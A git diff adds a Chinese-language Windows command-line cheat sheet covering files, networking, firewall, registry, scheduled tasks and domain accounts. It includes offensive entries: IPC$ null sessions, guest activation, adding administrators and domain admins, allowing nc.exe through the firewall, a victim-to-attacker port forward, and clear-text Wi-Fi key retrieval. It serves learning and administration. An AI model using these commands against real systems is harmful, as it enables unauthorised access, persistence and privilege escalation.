+
+cd /d d:\src&work.exe /o c:\result.txt
+先将当前工作目录切换到d:\src下,然后执行work.exe /o c:\result.txt命令
+```
+
+**&&**
+```cmd
+顺序执行多条命令,当碰到执行出错的命令后将不执行后面的命令
+
+find "ok" c:\test.txt && echo 成功
+如果找到了"ok"字样,就显示"成功",找不到就不显示
+```
+
+**||**
+```cmd
+顺序执行多条命令,当碰到执行正确的命令后将不执行后面的命令
+
+find "ok" c:\test.txt || echo 不成功
+如果找不到"ok"字样,就显示"不成功",找到了就不显示
+```
+
+**|**
+```cmd
+管道命令
+
+dir *.* /s/a | find /c ".exe"
+先执行 dir 命令,然后对输出结果(stdout)执行 find 命令(输出当前文件夹及所有子文件夹里的 .exe 文件的个数)
+
+dir *.* /s/a 2>&1 | find /c ".exe"
+先执行 dir 命令,然后对输出结果(stdout)和错误信息(stderr)执行 find 命令(输出当前文件夹及所有子文件夹里的.exe文件的个数)
+```
+
+**>**
+```cmd
+将当前命令输出以覆盖的方式重定向
+
+tasklist > p1.txt
+将 tasklist 的输出结果(stdout)以覆盖的方式重定向到 p1.txt 文件中(注:tasklist 的输出结果就不会打印到屏幕上了)
+
+tasklist 1> p1.txt
+等同于:tasklist > p1.txt
+
+dir bin 2> p1.txt
+输出结果(stdout)打印在屏幕上,错误信息(stderr)以覆盖的方式重定向到 p1.txt 中(注:bin 目录不存在时,会输出错误信息)
+
+dir bin > p1.txt 2>&1
+将错误信息(stderr)重定向到输出结果(stdout),然后将输出结果(stdout)以覆盖的方式重定向到 p1.txt 中(注:bin 目录不存在时,会输出错误信息)
+
+dir bin 2> p1.txt 1>&2
+将输出结果(stdout)重定向到错误信息(stderr),然后将错误信息(stderr)以覆盖的方式重定向到 p1.txt 中(注:bin 目录不存在时,会输出错误信息) 注:与上条命令结果一致
+
+tasklist >nul
+屏幕上不打印 tasklist 的输出结果(stdout),错误信息(stderr)仍会打印
+
+dir bin 2>nul
+屏幕上不打印命令的错误信息(stderr),输出结果(stdout)仍会打印(注:bin 目录不存在时,会输出错误信息)
+
+dir bin >nul 2>&1
+将命令的错误信息(stderr)重定向到输出结果(stdout),然后不打印输出结果(stdout)【屏幕上错误信息(stderr)和输出结果(stdout)都不打印】(注:bin 目录不存在时,会输出错误信息)
+
+dir bin 2>nul 1>&2
+将命令的输出结果(stdout)重定向到错误信息(stderr),然后不打印错误信息(stderr)【屏幕上错误信息(stderr)和输出结果(stdout)都不打印】(注:bin 目录不存在时,会输出错误信息)
+```
+
+**>>**
+```cmd
+将当前命令输出以追加的方式重定向
+
+tasklist >> p2.txt
+将 tasklist 的输出结果(stdout)以追加的方式重定向到 p2.txt 文件中(注:tasklist 的输出结果就不会打印到屏幕上了)
+
+tasklist 1>> p2.txt
+等同于:tasklist >> p2.txt
+
+dir bin 2>> p2.txt
+输出结果(stdout)打印在屏幕上,错误信息(stderr)以追加的方式重定向到 p2.txt 中(注:bin 目录不存在时,会输出错误信息)
+
+dir bin >> p2.txt 2>&1
+将错误信息(stderr)重定向到输出结果(stdout),然后将输出结果(stdout)以追加的方式重定向到 p2.txt 中(注:bin 目录不存在时,会输出错误信息)
+
+dir bin 2>> p2.txt 1>&2
+将输出结果(stdout)重定向到错误信息(stderr),然后将错误信息(stderr)以追加的方式重定向到 p2.txt 中(注:bin 目录不存在时,会输出错误信息) 注:与上条命令结果一致
+```
+
+**<**
+```cmd
+从文件中获得输入信息,而不是从屏幕上,一般用于 date time label 等需要等待输入的命令
+
+date 踢掉
+```
+
+**会话设置**
+```cmd
+title 正在做命令行测试 修改当前 cmd 窗口的标题栏文字为正在做命令行测试
+prompt orz: 将命令提示符修改为 orz:
+
+exit 退出当前 cmd 窗口实例
+
+ exit 0 退出当前 cmd 窗口实例,并将过程退出代码设置为 0(0 表示成功,非 0 表示失败)
+ exit /B 1 退出当前 bat 脚本,并将 ERRORLEVEL 系统变量设置为 1
+
+pause 暂停批处理程序,并显示出:请按任意键继续....
+
+color 设置当前 cmd 窗口背景色和前景色(前景色即为字体的颜色)
+ color 恢复到缺省设置
+ color 02 将背景色设为黑色,将字体设为绿色
+
+chcp 查看命令行环境字符编码(为一个全局设置)
+ 936 -- GBK(一般情况下为默认编码)
+ 437 -- 美国英语
+ 65001 -- utf-8
+ 1200 -- utf-16
+ 1201 -- utf-16(Big-Endian)
+ 12000 -- utf-32
+ 12001 -- utf-32(Big-Endian)
+```
+
+**永久修改 CMD 的默认字符集**
+
+regedit
+
+[HKEY_CURRENT_USER\Console] "CodePage"=dword:0000fde9
+
+
+---
+
+## 文件和目录
+
+**目录**
+```cmd
+cd 切换目录
+ cd .. 进入父目录
+ cd /d d: 进入上次d盘所在的目录(或在直接输入:d:)
+ cd /d d:\ 进入d盘根目录
+ cd d: 显示上次d盘所在的目录
+ cd /d d:\src 进入 d:\src 目录
+ cd prj\src\view 进入当前目录下的 prj\src\view 文件夹
+```
+
+### 查看
+
+**目录、文件信息**
+```cmd
+dir 显示目录中的内容
+ dir 显示当前目录中的子文件夹与文件
+ dir /b 只显示当前目录中的子文件夹与文件的文件名
+ dir /p 分页显示当前目录中的子文件夹与文件
+ dir /ad 显示当前目录中的子文件夹
+ dir /a-d 显示当前目录中的文件
+ dir c:\test 显示 c:\test 目录中的内容
+ dir keys.txt 显示当前目录中 keys.txt 的信息
+ dir /S 递归显示当前目录中的内容
+ dir key* 显示当前目录下以 key 开头的文件和文件夹的信息
+ dir /AH /OS 只显示当前目录中隐藏的文件和目录,并按照文件大小从小到大排序
+
+tree 显示目录结构
+ tree d:\myfiles 显示 d:\myfiles 目录结构
+
+attrib 查看或修改文件或目录的属性 【A:存档 R:只读 S:系统 H:隐藏】
+ attrib 1.txt 查看当前目录下 1.txt 的属性
+ attrib -R 1.txt 去掉 1.txt 的只读属性
+ attrib +H movie 隐藏 movie 文件夹
+```
+
+**文件内容**
+```cmd
+type 显示文本文件内容
+ type c:\11.txt 显示c盘中11.txt的文本内容
+ type conf.ini 显示当前目录下conf.ini的文本内容
+ type c:\11.txt | more 分页显示c盘中11.txt的文本内容
+
+more 逐屏的显示文本文件内容
+
+ more conf.ini 逐屏的显示当前目录下conf.ini的文本内容 【空格:下一屏 q:退出 】
+```
+
+---
+
+### 创建
+
+```cmd
+md 用于创建文件夹,不能创建文本文档或者其他
+ md movie music 在当前目录中创建名为 movie 和 music 的文件夹
+ md c:\aaa 在 C 盘的根目录下创建名为 aaa 的子目录;
+ md c:\aaa\USER 在 aaa 子目录下再创建 USER 子目录。
+```
+
+---
+
+### 删除
+
+```cmd
+del 删除文件 注意:目录及子目录都不会删除
+ del test
+ 删除当前目录下的 test 文件夹中的所有非只读文件(子目录下的文件不删除;删除前会进行确认;等价于 del test\*)
+
+ del /f test
+ 删除当前目录下的 test 文件夹中的所有文件(含只读文件;子目录下的文件不删除;删除前会进行确认;等价于 del /f test\*)
+
+ del /f /s /q test d:\test2\*.doc
+ 删除当前目录下的 test 文件夹中所有文件及 d:\test2 中所有 doc 文件(含只读文件;递归子目录下的文件;删除前不确认)
+
+ del /ar *.* 删除当前目录下所有只读文件
+ del /a-s *.* 删除当前目录下除系统文件以外的所有文件
+
+```
+
+---
+
+### 查询
+
+```cmd
+find 文件中搜索字符串
+ find /N /I "pid" 1.txt 在 1.txt 文件中忽略大小写查找 pid 字符串,并带行号显示查找后的结果
+ find /C "exe" 1.txt 只显示在 1.txt 文件中查找到 exe 字符串的次数
+ find /V "exe" 1.txt 显示未包含 1.txt 文件中未包含 exe 字符串的行
+
+findstr 文件中搜索字符串
+ findstr "hello world" 1.txt 在 1.txt 文件中搜索 hello 或 world
+ findstr /c:"hello world" 1.txt 在 1.txt 文件中搜索 hello world
+ findstr /c:"hello world" 1.txt nul 在 1.txt 文件中搜索 hello world,并在每行结果前打印出1.txt: 注:findstr 只有在2个及以上文件中搜索字符串时才会打印出每个文件的文件名,nul 表示一个空文件
+ findstr /s /i "Hello" *.* 不区分大小写,在当前目录和所有子目录中的所有文件中的 hello
+ findstr "^[0-9][a-z]" 1.txt 在 1.txt 中搜索以1个数字+1个小写字母开头子串的行
+```
+
+---
+
+### 修改
+
+```cmd
+ren 文件或目录重命名
+ ren rec.txt rec.ini 将当前目录下的 rec.txt 文件重命名为 rec.ini
+ ren c:\test test_01 将 c 盘下的 test 文件夹重命名为 test_01
+
+copy 拷贝文件
+ copy /Y key.txt c:\doc 将当前目录下的 key.txt 拷贝到 c:\doc 下(不询问,直接覆盖写)
+ copy key.txt + 复制文件到自己,实际上是修改了文件日期
+
+ copy key.txt c:\doc
+ 将当前目录下的 key.txt 拷贝到 c:\doc 下(若doc中也存在一个 key.txt 文件,会询问是否覆盖)
+
+ copy jobs c:\doc
+ 将当前目录下 jobs 文件夹中文件(不递归子目录)拷贝到 c:\doc 下(若 doc 中也存在相应的文件,会询问是否覆盖)
+
+ copy key.txt c:\doc\key_bak.txt
+ 将当前目录下的 key.txt 拷贝到 c:\doc 下,并重命名为 key_bak.txt(若 doc 中也存在一个 key_bak.txt 文件,会询问是否覆盖)
+
+ copy /Y key1.txt + key2.txt key.txt
+ 将当前目录下的 key1.txt 与 key2.txt 的内容合并写入 key.txt 中(不询问,直接覆盖写)
+
+ copy /B art_2.7z.* art_2.7z
+ 将当前目录下的 art_2.7z. 开头的所有文件(按照名称升序排序)依次合并生成 art_2.7z
+
+ copy /B art_2.7z.001+art_2.7z.002 art_2.7z
+ 将当前目录下的 art_2.7z.001、art_2.7z.002 文件合并生成 art_2.7z
+
+ copy test.txt \\host\c$\windows\temp\test.txt 远程拷贝
+
+xcopy 更强大的复制命令
+ xcopy c:\bat\hai d:\hello\ /y /h /e /f /c
+ 将 c:\bat\hai 中的所有内容拷贝到 d:\hello 中 注意:需要在 hello 后加上 \ 表示 hello 为一个目录,否则 xcopy 会询问 hello 是 F,还是 D
+
+ xcopy c:\bat\hai d:\hello\ /d:12-29-2010
+ 将 c:\bat\hai 中的2010年12月29日后更改的文件拷贝到 d:\hello 中
+
+robocopy 更强大的复制命令
+ robocopy .\Plugins .\PluginsDest /MIR /xd Intermediate Binaries
+ 将当前目录下 Plugins 中所有内容(排除名为 Intermediate 和 Binaries 的文件夹)保留目录结构拷贝到当前目录下的 PluginsDest 中(PluginsDest 不存在会自动创建)
+
+ robocopy c:\test d:\test2 /MIR /xd Intermediate /xf UE4Editor-SGame-Win64-DebugGame.dll *.pdb
+ 将c:\test中所有内容(排除名为 UE4Editor-SGame-Win64-DebugGame.dll 和 pdb 后缀的文件)保留目录结构拷贝到 d:\test2中(d:\test2 不存在会自动创建)
+
+move 移动文件
+ move *.png test
+ 将当前目录下的 png 图片移动到当前目录下 test 文件夹中 (若 test 中也存在同名的 png 图片,会询问是否覆盖)
+
+ move /Y *.png test
+ 将当前目录下的 png 图片移动到当前目录下 test 文件夹中 (不询问,直接覆盖写)
+
+ move 1.png d:\test\2.png
+ 将当前目录下的 1.png 移动到 d 盘 test 文件夹中,并重命名为 2.png (若 test 中也存在同名的png图片,会询问是否覆盖)
+
+ move test d:\new
+ 若 d 盘中存在 new 文件夹,将当前目录下的 test 文件夹移动到 d 盘 new 文件夹中;若不存在,将当前目录下的 test 文件夹移动到 d 盘,并重命名为 new
+
+replace 替换文件【即使这个文件在使用,仍然可以替换成功】
+ replace d:\love.mp3 d:\mp3
+ 使用 d 盘下的 love.mp3 强制替换 d 盘 mp3 目录中的 love.mp3 文件
+```
+
+```cmd
+assoc 设置'文件扩展名'关联到的'文件类型'
+ assoc 显示所有'文件扩展名'关联
+ assoc .txt 显示.txt代表的'文件类型',结果显示.txt=txtfile
+ assoc .doc 显示.doc代表的'文件类型',结果显示.doc=Word.Document.8
+ assoc .exe 显示.exe代表的'文件类型',结果显示.exe=exefile
+ assoc .txt=txtfile 恢复.txt的正确关联
+
+ftype 设置'文件类型'关联到的'执行程序和参数'
+ ftype 显示所有'文件类型'关联
+ ftype exefile 显示exefile类型关联的命令行,结果显示 exefile="%1" %*
+ ftype txtfile=C:\Windows\notepad.exe %1 设置txtfile类型关联的命令行为:C:\Windows\notepad.exe %1
+
+ 当双击一个.txt文件时,windows并不是根据.txt直接判断用notepad.exe打开
+ 而是先判断.txt属于txtfile'文件类型';再调用txtfile关联的命令行:txtfile=%SystemRoot%\system32\NOTEPAD.EXE %1
+
+forfiles 递归目录执行命令
+
+ forfiles /p . /m .svn /s /c "cmd /c svn up -r12005"
+ 在当前目录下查找含有.svn的文件或目录(递归子目录),并对该目录执行指定版本号svn更新
+
+ forfiles /p c:\myfiles /m .svn /s /c "cmd /c svn up -r12005"
+ 在c:\myfiles目录下查找含有.svn的文件或目录(递归子目录),并对该目录执行指定版本号svn更新
+```
+
+### 链接
+
+win7 下的 mklink 命令通过指定参数可以建立出不同形式的文件或目录链接,分为硬链接(hard link)、符号链接(symbolic link)和目录联接(junction)三种。
+
+- 符号链接(symbolic link)
+
+ 建立一个软链接相当于建立一个文件(或目录),这个文件(或目录)用于指向别的文件(或目录),和 win 的快捷方式有些类似。删除这个链接,对原来的文件(或目录)没有影像没有任何影响;而当你删除原文件(或目录)时,再打开链接则会提示“位置不可用”。
+
+- 目录联接(junction)
+
+ 作用基本和符号链接类似。区别在于,目录联接在建立时会自动引用原目录的绝对路径,而符号链接允许相对路径的引用。
+
+- 硬链接(hard link)
+
+ 建立一个硬链接相当于给文件建立了一个别名,例如对 1.txt 创建了名字为 2.txt 的硬链接;
+
+ 若使用记事本对 1.txt 进行修改,则 2.txt 也同时被修改,若删除 1.txt,则 2.txt 依然存在,且内容与 1.txt 一样。
+
+建立链接请注意:
+1. 建立文件或目录链接限于 NTFS 文件系统;符号链接(目录联接)的建立可以跨分区(如:在 d 盘可以建立 c 盘文件或目录的链接),硬链接只能建立同一分区内的文件指向
+2. 硬链接只能用于文件,不能用于目录;目录联接只能用于目录;符号链接则均可以;
+3. 硬链接不允许对空文件建立链接,符号(软链接可以。
+)
+```cmd
+mklink 创建符号链接(win7 引入);创建的符号链接文件上会有一个类似快捷方式的箭头
+ mklink /j "C:\Users" "D:\Users" 创建 D 盘 Users 目录联接到 C 盘,并命名为 Users
+```
+
+---
+
+# 网络管理
+
+**net**
+```cmd
+net use \\IP\ipc$ " " /user:" " 建立 IPC 空链接
+net use \\IP\ipc$ "密码" /user:"用户名" 建立 IPC 非空链接
+net use z: \\ip\ipc$ "pass" /user:"user" 直接登陆后映射对方 C: 到本地为 H:
+net use h: ipc$ 登陆后映射对方 C: 到本地为 H:
+net use \\IP\ipc$ /del 删除 IPC 链接
+net use h: /del 删除映射对方到本地的为 H: 的映射
+net user 用户名 密码 /add 建立用户
+net user guest /active:yes 激活 guest 用户
+net user 查看有哪些用户
+net user 帐户名 查看帐户的属性
+net localgroup administrators 用户名 /add 把"用户"添加到管理员中使其具有管理员权限
+net start 查看开启了哪些服务
+net start 服务名 开启服务;(如:net start telnet, net start schedule)
+net stop 服务名 停止某服务
+net time 目标ip 查看对方时间
+net time 目标ip /set 设置本地计算机时间与"目标IP"主机的时间同步,加上参数 /yes 可取消确认
+net view 查看本地局域网内开启了哪些共享
+net view 查看对方局域网内开启了哪些共享
+net config 显示系统网络设置
+net logoff 断开连接的共享
+net pause 服务名 暂停某服务
+net send ip "文本信息" 向对方发信息
+net ver 局域网内正在使用的网络连接类型和信息
+net share 查看本地开启的共享
+net share ipc$ 开启 ipc$ 共享
+net share db$=d:\config 开启一个共享名为 db$,在 d:\config
+net share ipc$ /del 删除 ipc$ 共享
+net share c$ /del 删除 C: 共享
+net user guest 12345 用 guest 用户登陆后用将密码改为 12345
+net password 密码 更改系统登陆密码
+```
+
+## 查看网络信息
+
+**ipconfig**
+```cmd
+ipconfig /all 显示完整配置信息
+ipconfig /release 释放指定适配器的 IPv4 地址
+ipconfig /release6 释放指定适配器的 IPv6 地址
+ipconfig /renew 更新指定适配器的 IPv4 地址
+ipconfig /renew6 更新指定适配器的 IPv6 地址
+ipconfig /flushdns 清除 DNS 解析程序缓存
+```
+
+**netstat**
+```cmd
+netstat -a 查看开启了哪些端口,常用 netstat -an
+netstat -n 查看端口的网络连接情况,常用 netstat -an
+netstat -v 查看正在进行的工作
+netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况
+netstat -s 查看正在使用的所有协议使用情况
+netstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名
+
+netstat -bn 查看每个程序的连接
+```
+
+**route**
+```cmd
+route print
+route print 192.*
+route add 0.0.0.0 mask 0.0.0.0 192.168.6.1 增加网关
+route delete 0.0.0.0 mask 0.0.0.0 192.168.6.1 删除网关
+route change 16.21.0.0 mask 255.255.0.0 16.28.0.25 将 16.21.0.0 段的网关改为 0.25
+```
+
+**arp**
+```cmd
+arp -a 查看全部 arp 条目
+arp -d ip 删除
+```
+
+**nslookup**
+```cmd
+nslookup domain [dns-server] 查询域名A记录
+nslookup -qt=type domain [dns-server] 查询其他记录
+ A 地址记录
+ AAAA 地址记录
+ AFSDB Andrew文件系统数据库服务器记录
+ ATMA ATM地址记录
+ CNAME 别名记录
+ HINFO 硬件配置记录,包括 CPU、操作系统信息
+ ISDN 域名对应的 ISDN 号码
+ MB 存放指定邮箱的服务器
+ MG 邮件组记录
+ MINFO 邮件组和邮箱的信息记录
+ MR 改名的邮箱记录
+ MX 邮件服务器记录
+ NS 名字服务器记录
+ PTR 反向记录
+ RP 负责人记录
+ RT 路由穿透记录
+ SRV TCP服务器信息记录
+ TXT 域名对应的文本信息
+ X25 域名对应的X.25地址记录
+```
+
+## 网络排错工具
+
+**ping**
+```cmd
+ping ip(或域名) 向对方主机发送默认大小为32字节的数据
+ping -l 数据包大小 ip
+ping -n 发送数据次数 ip
+ping -t ip 一直 ping.
+ping -t -l 65500 ip 发送大于64K的文件并一直 ping
+```
+
+**tracert**
+```cmd
+-d 不将地址解析成主机名.
+-h maximum_hops 搜索目标的最大跃点数.
+-j host-list 与主机列表一起的松散源路由(仅适用于 IPv4).
+-w timeout 等待每个回复的超时时间(以毫秒为单位).
+-R 跟踪往返行程路径(仅适用于 IPv6).
+-S srcaddr 要使用的源地址(仅适用于 IPv6).
+-4 强制使用 IPv4.
+-6 强制使用 IPv6.
+```
+
+---
+
+## 防火墙
+
+**netsh**
+
+查看防火墙状态
+```cmd
+netsh firewall show state
+netsh advfirewall show allprofiles
+```
+
+开启防火墙
+```cmd
+netsh firewall set opmode enable
+netsh firewall set allprofiles state on
+```
+
+关闭防火墙
+```cmd
+netsh firewall set opmode disable
+netsh advfirewall set allprofiles state off
+```
+
+设置防火墙日志路径
+```cmd
+netsh advfirewall set currentprofile logging filename "C:\Windows\firewall.log"
+```
+
+添加防火墙规则
+```cmd
+netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=tcp localport=3389
+```
+
+删除防火墙规则
+```cmd
+netsh advfirewall firewall delete rule name="rule_name"
+```
+
+添加端口规则
+```cmd
+netsh firewall portopening tcp 1234 rule_name
+```
+
+删除端口规则
+```cmd
+netsh firewall delete portopening tcp 1234
+```
+
+添加程序规则
+```cmd
+netsh firewall add allowedprogram "C:\\nc.exe" "allow nc" enable
+```
+
+删除程序规则
+```cmd
+netsh firewall delete allowedprogram "C:\\nc.exe"
+```
+
+添加端口转发
+```cmd
+netsh interface portproxy add v4tov4 [listenaddress=victim_ip] listenport=victim_port connectaddress=attack_ip connectport=attack_port
+```
+
+删除端口转发
+```cmd
+netsh interface portproxy delete v4tov4 [listenaddress=victim_ip] listenport=victim_port
+```
+
+查看端口转发
+```cmd
+netsh interface portproxy show all
+netsh interface portproxy show v4tov4
+netsh interface portproxy show v4tov6
+netsh interface portproxy show v6tov4
+netsh interface portproxy show v6tov6
+```
+
+安装 IPv6
+```cmd
+netsh interface ipv6 install
+```
+
+查看无线网络信息
+```cmd
+netsh wlan show profiles
+```
+
+查看指定 WIFI 密码
+```cmd
+netsh wlan show profiles wifi_name key=clear
+```
+
+---
+
+# 系统管理
+
+## 系统信息
+
+- 内容参见 [信息](./笔记/信息.md)
+
+### 日志
+
+- 内容参见 [日志](./笔记/日志.md)
+
+---
+
+## 系统设置
+
+### 时间
+
+```cmd
+time 显示或设置当前时间
+
+ time /t 显示当前时间
+ time 设置新的当前时间(格式:hh:mm:ss),直接回车则表示放弃设置
+
+date 显示或设置当前日期
+
+ date /t 显示当前日期
+ date 设置新的当前日期(格式:YYYY/MM/DD),直接回车则表示放弃设置
+```
+
+### 注册表
+
+reg 注册表相关操作
+
+参数说明:
+```
+KeyName [\Machine]FullKey
+ Machine 为远程机器的机器名 - 忽略默认到当前机器。
+ 远程机器上只有 HKLM 和 HKU。
+ FullKey ROOTKEY+SubKey
+ ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]
+ SubKey 所选ROOTKEY下注册表项的完整名
+/v 所选项之下要添加的值名
+/ve 为注册表项添加空白值名<无名称>
+/t RegKey 数据类型
+ [ REG_SZ | REG_MULTI_SZ | REG_DWORD_BIG_ENDIAN |
+ REG_DWORD | REG_BINARY | REG_DWORD_LITTLE_ENDIAN |
+ REG_NONE | REG_EXPAND_SZ ]
+ 如果忽略,则采用 REG_SZ
+/s 指定一个在 REG_MULTI_SZ 数据字符串中用作分隔符的字符;如果忽略,则将""用作分隔符
+/d 要分配给添加的注册表 ValueName 的数据
+/f 不提示,强行改写现有注册表项
+```
+```cmd
+reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v MyApp /t REG_SZ /d "c:\tools\myapp.exe" /f
+强制添加一条开机启动 c:\tools\myapp.exe 程序的注册表项
+
+reg add "HKLM\SOFTWARE\ScmClient" /v AgreementConfirmed /t REG_SZ /d 1 /f
+解决 32 位 xp 打开 ioa 后,弹出的框关不掉问题
+
+reg add "HKCU\ControlPanel\Desktop" /v WaitToKIllAppTimeOut /t REG_SZ /d 10000 /f
+强制添加一条加速关闭应用程序的注册表项
+
+reg add "hkcu\software\Unity Technologies\Unity Editor 4.x" /v JdkPath_h4127442381 /t REG_SZ /f
+将 JdkPath_h4127442381 设置为空
+
+reg add "HKCR\*\shell\WinDbg\command" /t REG_SZ /d "\"D:\Program Files (x86)\windbg\windbg.exe\" -z \"%1\" " /f
+强制添加 windbg 打开 dump 文件到右键菜单的注册表项(不指明 /v,键值将写入默认值名中)
+
+reg add "HKCR\*\shell\WinHex\command" /t REG_SZ /d "\"D:\software-setup\system\winhex\winhex.exe\" \"%1\" " /f
+强制添加 winhex 到右键菜单的注册表项(不指明 /v,键值将写入默认值名中)
+
+reg add "hkcu\software\microsoft\windows\currentversion\internet settings" /v AutoConfigURL /t REG_SZ /d "http://txp-01.tencent.com/proxy.pac" /f
+为 IE 设置代理:http://txp-01.tencent.com/proxy.pac
+
+reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f
+关闭 IE 代理服务器选项
+
+reg add "hkcu\software\Sysinternals\Process Monitor" /v EulaAccepted /t REG_DWORD /d 1 /f
+为 Procmon.exe 工具(Process Monitor 为其属性面板上的描述名)添加 License 同意
+
+reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v MyApp /f
+强制删除值名的 MyApp 的注册表项
+
+reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f
+强制删除让任务栏里的任务管理器为灰色的注册表项
+
+reg delete HKEY_CURRENT_USER\Environment /v HTTP_proxy /f
+删除 http 代理
+
+reg delete HKEY_CURRENT_USER\Environment /v HTTPS_proxy /f
+删除 https 代理
+
+reg copy "hkcu\software\microsoft\winmine" "hkcu\software\microsoft\winminebk" /s /f
+强制复制 winmine 下所有的子项与值到 winminebk 中
+
+reg export "hkcu\software\microsoft\winmine" c:\regbak\winmine.reg
+导出 winmine 下所有的子项与值到 c:\regbak\winmine.reg 文件中
+
+reg import c:\regbak\winmine.reg
+导入 c:\regbak\winmine.reg 文件到注册表中
+
+reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE" /s
+查询 ie 的安装路径
+
+reg query HKCR\.dsw /ve
+查询 .dsw 默认值
+
+reg query HKEY_CURRENT_USER\Software\Tencent\QQGame\SYS /v GameDirectory
+查询 QQGame 安装路径
+```
+
+### 计划任务
+
+**at**
+```cmd
+at id号 开启已注册的某个计划任务
+at /delete 停止所有计划任务,用参数 /yes 则不需要确认就直接停止
+at id号 /delete 停止某个已注册的计划任务
+at 查看所有的计划任务
+at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
+```
+
+**[Schtasks.exe](https://docs.microsoft.com/en-us/windows/win32/taskschd/schtasks)**
+
+创建计划任务 "gametime",在每月的第一个星期天运行"空当接龙".
+```cmd
+SCHTASKS /Create /SC MONTHLY /MO first /D SUN /TN gametime /TR c:\windows\system32\freecell
+
+- /SC schedule 指定计划频率.有效计划任务: MINUTE、 HOURLY、DAILY、WEEKLY、MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE, ONEVENT.
+- /MO modifier 改进计划类型以允许更好地控制计划重复周期.有效值列于下面"修改者"部分中.
+- /D days 指定该周内运行任务的日期.有效值:MON、TUE、WED、THU、FRI、SAT、SUN和对 MONTHLY 计划的 1 - 31(某月中的日期).通配符"*"指定所有日期.
+- /TN taskname 以路径\名称形式指定对此计划任务进行唯一标识的字符串.
+- /TR taskrun 指定在这个计划时间运行的程序的路径和文件名.例如: C:\windows\system32\calc.exe
+```
+```
+schtasks /query /fo LIST /v 以较为详细易于阅读的格式显示本机所有任务计划信息
+
+schtasks /delete /tn "Soda Build" /f 强制删除 Soda Build 名称的任务计划(不进行确认)
+schtasks /run /tn "Soda Build" 执行名为 Soda Build 的任务计划
+schtasks /end /tn "Soda Build" 终止执行名为 Soda Build 的任务计划
+
+schtasks /create /sc minute /mo 20 /tn "Soda Build" /tr d:\check.vbs
+创建一个名为 Soda Build 的任务计划:该任务计划每 20 分钟执行一下 d:\check.vbs 脚本
+
+schtasks /create /tn "Soda Build" /tr D:\updateall.bat /sc daily /st 02:06 /f
+强制创建一个名为 Soda Build 的任务计划(不进行确认):该任务计划每天凌晨 2 点 06 分执行一下 D:\updateall.bat 脚本
+
+schtasks /change /tn "Soda Build" /tr d:\check2.vbs
+将名为 Soda Build 的任务计划的执行脚本修改为 d:\check2.vbs
+```
+
+### 组策略
+
+**强制更新组策略**
+```
+gpupdate /force
+```
+
+---
+
+## 账号管控
+
+**账号**
+```
+net user test 1234abcd /add 添加用户
+net localgroup administrators test /add 将用户添加到管理组
+
+net user test /del 删除用户
+```
+
+---
+
+## 进程管理
+
+**进程信息**
+```cmd
+wmic process where Caption="buyticket.exe" get commandline,ExecutablePath,ProcessId,ThreadCount /value
+查看名为"buyticket.exe"所有进程命令行,exe 全路径,PID 及线程数
+
+wmic process where Caption="buyticket.exe" get ExecutablePath,HandleCount /value
+查看名为"buyticket.exe"所有进程的 exe 全路径及当前打开的句柄数
+
+wmic process where Caption="buyticket.exe" get ExecutablePath,VirtualSize,WorkingSetSize /value
+查看名为"buyticket.exe"所有进程的 exe 全路径、当前虚拟地址空间占用及物理内存工作集
+
+tasklist 显示所有进程及其服务
+
+ tasklist /svc
+
+ tasklist /fi "pid eq 1234" /svc 显示指定进程信息
+ tasklist /fi "status eq running" /svc
+ tasklist /fi "status eq running" /fi "username eq nt authority\system" /svc
+
+ tasklist /m xxx.dll 显示使用给定 exe/dll 名称的所有进程
+
+ tasklist /s ip /u username /p password /svc 显示远程主机的进程信息
+```
+
+**进程处理**
+```cmd
+taskkill 终止指定的进程及其子进程(根据进程名称)
+
+ taskkill /f /im notepad.exe /t
+ taskkill /f /pid 1234 /t 终止指定进程及其子进程(根据进程 ID)
+ taskkill /f /fi "pid eq 1234" /t
+
+ taskkill /s ip /u username /p password /pid 1234 /t 终止远程主机的指定进程
+ taskkill /s ip /u username /p password /fi "pid eq 1234" /t
+```
+
+---
+
+## 设备管理
+
+### 硬盘-数据
+
+**卷标设置**
+```cmd
+vol 显示当前分区的卷标
+label 显示当前分区的卷标,同时提示输入新卷标
+ label c:system 设置 c 盘的卷标为 system
+```
+
+**格式化**
+```cmd
+format 格式化磁盘
+ format J: /FS:ntfs 以 ntfs 类型格式化 J 盘 【类型有:FAT、FAT32、exFAT、NTFS 或 UDF】
+ format J: /FS:fat32 /Q 以 fat32 类型快速格式化J盘
+```
+
+**状态检查**
+```cmd
+chkdsk /f D: 检查磁盘 D 并显示状态报告;加参数/f表示同时会修复磁盘上的错误
+```
+
+**磁盘映射**
+```cmd
+subst 磁盘映射 -- 磁盘映射信息都保存在注册表以下键值中:HKEY_CURRENT_USER\Network
+ subst 显示目前所有的映射
+ subst z: \\com\software 将 \\com\software 共享映射为本地 z 盘
+ subst y: e:\src 将 e:\src 映射为本地 y 盘
+ subst z: /d 删除 z 盘映射
+```
+
+---
+
+# 域
+
+**添加域管理员账号**
+```
+net user mstlab mstlab /add /domain 添加用户并设置密码
+net group "Domain Admins" lemon /add /domain 将普通域用户提升为域管理员
+net user guest /active:yes 激活 guest 用户
+net user guest mstlab 更改 guest用户的密码
+```
+
+**修改指定域用户的密码**
+```
+dsquery user -samid username | dsmod user -pwd new_password
+```
diff --git "a/1earn/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/Windows\345\237\237\346\220\255\345\273\272.md" "b/1earn/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/Windows\345\237\237\346\220\255\345\273\272.md"
new file mode 100644
index 00000000..153ddd40
--- /dev/null
+++ "b/1earn/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/Windows\345\237\237\346\220\255\345\273\272.md"
@@ -0,0 +1,253 @@
+# Windows 域搭建
+
+
+
+
+
+---
+
+# 域结构
+
